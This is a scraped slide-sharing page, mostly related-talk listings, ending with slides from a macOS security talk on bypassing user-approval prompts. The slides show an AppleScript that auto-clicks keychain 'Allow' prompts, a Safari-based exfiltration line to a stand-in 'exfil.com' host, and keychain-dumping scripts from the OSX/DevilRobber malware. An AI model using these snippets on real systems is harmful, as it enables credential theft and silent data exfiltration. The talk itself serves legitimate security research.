Alexey Buzdin "Maslow's Pyramid of Android Testing"IT Event
 
There's Waldo by Patrick Wardle & Colby Moore
There's Waldo by Patrick Wardle & Colby MooreThere's Waldo by Patrick Wardle & Colby Moore
There's Waldo by Patrick Wardle & Colby MooreShakacon
 
Eddystone Beacons - Physical Web - Giving a URL to All Objects
Eddystone Beacons - Physical Web - Giving a URL to All ObjectsEddystone Beacons - Physical Web - Giving a URL to All Objects
Eddystone Beacons - Physical Web - Giving a URL to All ObjectsJeff Prestes
 
10 Excellent Ways to Secure Your Spring Boot Application - Devoxx Morocco 2019
10 Excellent Ways to Secure Your Spring Boot Application - Devoxx Morocco 201910 Excellent Ways to Secure Your Spring Boot Application - Devoxx Morocco 2019
10 Excellent Ways to Secure Your Spring Boot Application - Devoxx Morocco 2019Matt Raible
 
Bonnes pratiques de développement avec Node js
Bonnes pratiques de développement avec Node jsBonnes pratiques de développement avec Node js
Bonnes pratiques de développement avec Node jsFrancois Zaninotto
 
Hopping in clouds: a tale of migration from one cloud provider to another
Hopping in clouds: a tale of migration from one cloud provider to anotherHopping in clouds: a tale of migration from one cloud provider to another
Hopping in clouds: a tale of migration from one cloud provider to anotherMichele Orselli
 
Maven + Jsf + Richfaces + Jxl + Jdbc - Complete Code Example
Maven + Jsf + Richfaces + Jxl + Jdbc - Complete Code ExampleMaven + Jsf + Richfaces + Jxl + Jdbc - Complete Code Example
Maven + Jsf + Richfaces + Jxl + Jdbc - Complete Code ExampleNikhil Bhalwankar
 

What's hot (20)

Top Ten Web Defenses - DefCamp 2012
Top Ten Web Defenses - DefCamp 2012Top Ten Web Defenses - DefCamp 2012
Top Ten Web Defenses - DefCamp 2012
 
Arduino、Web 到 IoT
Arduino、Web 到 IoTArduino、Web 到 IoT
Arduino、Web 到 IoT
 
Praktik Pengembangan Konten E-Learning HTML5 Sederhana
Praktik Pengembangan Konten E-Learning HTML5 SederhanaPraktik Pengembangan Konten E-Learning HTML5 Sederhana
Praktik Pengembangan Konten E-Learning HTML5 Sederhana
 
Android Best Practices
Android Best PracticesAndroid Best Practices
Android Best Practices
 
Improving android experience for both users and developers
Improving android experience for both users and developersImproving android experience for both users and developers
Improving android experience for both users and developers
 
Droidcon2013 android experience lahoda
Droidcon2013 android experience lahodaDroidcon2013 android experience lahoda
Droidcon2013 android experience lahoda
 
Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!
Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!
Using npm to Manage Your Projects for Fun and Profit - USEFUL INFO IN NOTES!
 
WebLogic Administration und Deployment mit WLST
WebLogic Administration und Deployment mit WLSTWebLogic Administration und Deployment mit WLST
WebLogic Administration und Deployment mit WLST
 
Mach-O par Stéphane Sudre
Mach-O par Stéphane SudreMach-O par Stéphane Sudre
Mach-O par Stéphane Sudre
 
Node.js 0.8 features
Node.js 0.8 featuresNode.js 0.8 features
Node.js 0.8 features
 
Config mp
Config mpConfig mp
Config mp
 
Beacons, Raspberry Pi & Node.js
Beacons, Raspberry Pi & Node.jsBeacons, Raspberry Pi & Node.js
Beacons, Raspberry Pi & Node.js
 
Alexey Buzdin "Maslow's Pyramid of Android Testing"
Alexey Buzdin "Maslow's Pyramid of Android Testing"Alexey Buzdin "Maslow's Pyramid of Android Testing"
Alexey Buzdin "Maslow's Pyramid of Android Testing"
 
There's Waldo by Patrick Wardle & Colby Moore
There's Waldo by Patrick Wardle & Colby MooreThere's Waldo by Patrick Wardle & Colby Moore
There's Waldo by Patrick Wardle & Colby Moore
 
Micro app-framework
Micro app-frameworkMicro app-framework
Micro app-framework
 
Eddystone Beacons - Physical Web - Giving a URL to All Objects
Eddystone Beacons - Physical Web - Giving a URL to All ObjectsEddystone Beacons - Physical Web - Giving a URL to All Objects
Eddystone Beacons - Physical Web - Giving a URL to All Objects
 
10 Excellent Ways to Secure Your Spring Boot Application - Devoxx Morocco 2019
10 Excellent Ways to Secure Your Spring Boot Application - Devoxx Morocco 201910 Excellent Ways to Secure Your Spring Boot Application - Devoxx Morocco 2019
10 Excellent Ways to Secure Your Spring Boot Application - Devoxx Morocco 2019
 
Bonnes pratiques de développement avec Node js
Bonnes pratiques de développement avec Node jsBonnes pratiques de développement avec Node js
Bonnes pratiques de développement avec Node js
 
Hopping in clouds: a tale of migration from one cloud provider to another
Hopping in clouds: a tale of migration from one cloud provider to anotherHopping in clouds: a tale of migration from one cloud provider to another
Hopping in clouds: a tale of migration from one cloud provider to another
 
Maven + Jsf + Richfaces + Jxl + Jdbc - Complete Code Example
Maven + Jsf + Richfaces + Jxl + Jdbc - Complete Code ExampleMaven + Jsf + Richfaces + Jxl + Jdbc - Complete Code Example
Maven + Jsf + Richfaces + Jxl + Jdbc - Complete Code Example
 

Similar to The Mouse is mightier than the sword

DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionDEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionFelipe Prado
 
Zeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanningZeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanningSynack
 
ZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningMikhail Sosonkin
 
iOS Automation Primitives
iOS Automation PrimitivesiOS Automation Primitives
iOS Automation PrimitivesSynack
 
Owasp orlando, april 13, 2016
Owasp orlando, april 13, 2016Owasp orlando, april 13, 2016
Owasp orlando, april 13, 2016Mikhail Sosonkin
 
Gatekeeper Exposed
Gatekeeper ExposedGatekeeper Exposed
Gatekeeper ExposedSynack
 
Fire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS FirewallsFire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS FirewallsPriyanka Aash
 
SSL Failing, Sharing, and Scheduling
SSL Failing, Sharing, and SchedulingSSL Failing, Sharing, and Scheduling
SSL Failing, Sharing, and SchedulingDavid Evans
 
Introduction to Node.js
Introduction to Node.jsIntroduction to Node.js
Introduction to Node.jsNodeXperts
 
Internet of Things Magic Show
Internet of Things Magic ShowInternet of Things Magic Show
Internet of Things Magic ShowStephen Chin
 
Secure Coding For Java - Une introduction
Secure Coding For Java - Une introductionSecure Coding For Java - Une introduction
Secure Coding For Java - Une introductionSebastien Gioria
 
Visual Component Testing -- w/ Gil Tayar (Applitools) and Gleb Bahmutov (Cyp...
Visual Component Testing -- w/ Gil Tayar (Applitools) and Gleb Bahmutov (Cyp...Visual Component Testing -- w/ Gil Tayar (Applitools) and Gleb Bahmutov (Cyp...
Visual Component Testing -- w/ Gil Tayar (Applitools) and Gleb Bahmutov (Cyp...Applitools
 
Remote Notifications
Remote NotificationsRemote Notifications
Remote NotificationsJosef Cacek
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
What the Struts?
What the Struts?What the Struts?
What the Struts?Joe Kutner
 
Reutov, yunusov, nagibin random numbers take ii
Reutov, yunusov, nagibin random numbers take iiReutov, yunusov, nagibin random numbers take ii
Reutov, yunusov, nagibin random numbers take iiDefconRussia
 
[NDC 2019] Enterprise-Grade Serverless
[NDC 2019] Enterprise-Grade Serverless[NDC 2019] Enterprise-Grade Serverless
[NDC 2019] Enterprise-Grade ServerlessKatyShimizu
 

Similar to The Mouse is mightier than the sword (20)

DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionDEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
 
Zeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanningZeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanning
 
ZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanning
 
iOS Automation Primitives
iOS Automation PrimitivesiOS Automation Primitives
iOS Automation Primitives
 
Owasp orlando, april 13, 2016
Owasp orlando, april 13, 2016Owasp orlando, april 13, 2016
Owasp orlando, april 13, 2016
 
Gatekeeper Exposed
Gatekeeper ExposedGatekeeper Exposed
Gatekeeper Exposed
 
Fire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS FirewallsFire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS Firewalls
 
SSL Failing, Sharing, and Scheduling
SSL Failing, Sharing, and SchedulingSSL Failing, Sharing, and Scheduling
SSL Failing, Sharing, and Scheduling
 
Introduction to Node.js
Introduction to Node.jsIntroduction to Node.js
Introduction to Node.js
 
Internet of Things Magic Show
Internet of Things Magic ShowInternet of Things Magic Show
Internet of Things Magic Show
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Secure Coding For Java - Une introduction
Secure Coding For Java - Une introductionSecure Coding For Java - Une introduction
Secure Coding For Java - Une introduction
 
Visual Component Testing -- w/ Gil Tayar (Applitools) and Gleb Bahmutov (Cyp...
Visual Component Testing -- w/ Gil Tayar (Applitools) and Gleb Bahmutov (Cyp...Visual Component Testing -- w/ Gil Tayar (Applitools) and Gleb Bahmutov (Cyp...
Visual Component Testing -- w/ Gil Tayar (Applitools) and Gleb Bahmutov (Cyp...
 
mobl
moblmobl
mobl
 
Remote Notifications
Remote NotificationsRemote Notifications
Remote Notifications
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'
 
What the Struts?
What the Struts?What the Struts?
What the Struts?
 
Reutov, yunusov, nagibin random numbers take ii
Reutov, yunusov, nagibin random numbers take iiReutov, yunusov, nagibin random numbers take ii
Reutov, yunusov, nagibin random numbers take ii
 
Random numbers
Random numbersRandom numbers
Random numbers
 
[NDC 2019] Enterprise-Grade Serverless
[NDC 2019] Enterprise-Grade Serverless[NDC 2019] Enterprise-Grade Serverless
[NDC 2019] Enterprise-Grade Serverless
 

More from Priyanka Aash

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfPriyanka Aash
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfPriyanka Aash
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfPriyanka Aash
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfPriyanka Aash
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfPriyanka Aash
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfPriyanka Aash
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdfPriyanka Aash
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfPriyanka Aash
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfPriyanka Aash
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfPriyanka Aash
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldPriyanka Aash
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksPriyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security GovernancePriyanka Aash
 

More from Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Recently uploaded

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 

Recently uploaded (20)

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 

The Mouse is mightier than the sword

  • 1. digita security The Mouse is mightier than the sword
  • 2. WHOIS cybersecurity solutions for the macOS enterprise @patrickwardle synack digitansanasa
  • 3. Outline the targets (past) attacks mitigations full bypass weaponization
  • 5. The Attacker's Conundrum keychain kexts keylogger firewalls } alert! many 'useful' actions (e.g. accessing the keychain, loading a kext, etc.) now generate an alert that (ideally) the user must explicitly interact with. #security
  • 6. The Goal avoid all together dismiss (via code) for alerts: $ ./dumpKeychain of course, Apple tries to prevent both these scenarios! ...more on this shortly ;) //query keychain logic ... //bypass // pseudo-code if(accessAlertWindow) { sendClick(); } dismiss alert via code?! " "
  • 7. The Targets the macOS keychain $ /usr/bin/security dump-keychain -d login.keychain keychain: "~/Library/Keychains/login.keychain-db" class: "genp" attributes: 0x00000007 <blob>="GitHub - https://api.github.com" data: "7257b03422bbab65f0e7d22be57c0b944a0ae45d9e" private keys passwords certificates autofill data dumping keys } auth tokens Keychain Access.app app data access alerts (UI) as normal user!
  • 8. hunter2 The Targets 'Security & Privacy' › 'Accessibility' "Apps with access to the accessibility API are allowed to manipulate the UIs of other applications. This gives them the ability to inject events into other processes, and allows them do pretty much anything you can. They can also log all your keystrokes." -superuser.com UI events & manipulations keylogging! Accessibility Pane }
  • 9. The Targets "User-Approved Kernel Extension Loading" "I got 99 Problems, but Little Snitch ain’t one!" -Wardle/DefCon '16 "macOS High Sierra introduces a new feature that requires user approval before loading new third-party kernel extensions" -apple.com Technical Note TN2459: "User-Approved Kext Loading" 
 -apple.com approval required " "
  • 10. The Targets Security Alerts/(3rd-party)Tools $ nc -l 1337 macOS firewall alert blockblock alert ransomwhere? alert Allow " "
  • 11. digita security (PAST) ATTACKS alerts & prompts; hackers vs. apple
  • 12. The Attacks alerts: attack vectors applescript coregraphics UI 'bypass' ??? avoid all together || dismiss (via code)
  • 13. AppleScript "AppleScript is primarily an inter-application processing system, designed to exchange data between and control other applications" -wikipedia.com in context of remote process! $ cat evil.scpt do shell script "say hi" with administrator privileges $ osascript evil.scpt trusted auth prompt? clicks //firewall bypass tell application "Safari" run tell application "Finder" to set visible of process "Safari" to false make new document set the URL of document 1 to "https://exfil.com?data=blah" end tell actions = or }
  • 14. automated keychain access AppleScript commands //keychain bypass // note: only works on older version of macOS tell application "System Events" repeat while exists (processes where name is "SecurityAgent") tell process "SecurityAgent" click button "Allow" of group 1 of window 1 end tell delay 0.2 end repeat end tell keychain access prompt clicking 'Allow' via AppleScript $ security dump-keychain ... class: "genp" attributes: ... "acct"<blob>="patrickwardle" "svce"<blob>="www.bankofamerica.com" password: "hunter2" passwords! Allow " "
  • 15. kd.sh automated keychain access (OSX.DevilRobber) AppleScript sub_26FA proc near push ebp mov ebp, esp sub esp, 18h mov [esp+18h+var_18], "./kc_dump.sh" call _system$UNIX2003 $ cat kc_dump.sh #!/bin/sh ./kd.sh & for i in {1..300} do osascript kcd.scpt done $ cat kd.sh #!/bin/sh security dump-keychain -d > s_dump.txt OSX/DevilRobber kc_dump.sh kcd.scpt thanks @noarfromspace :) Always Allow " "
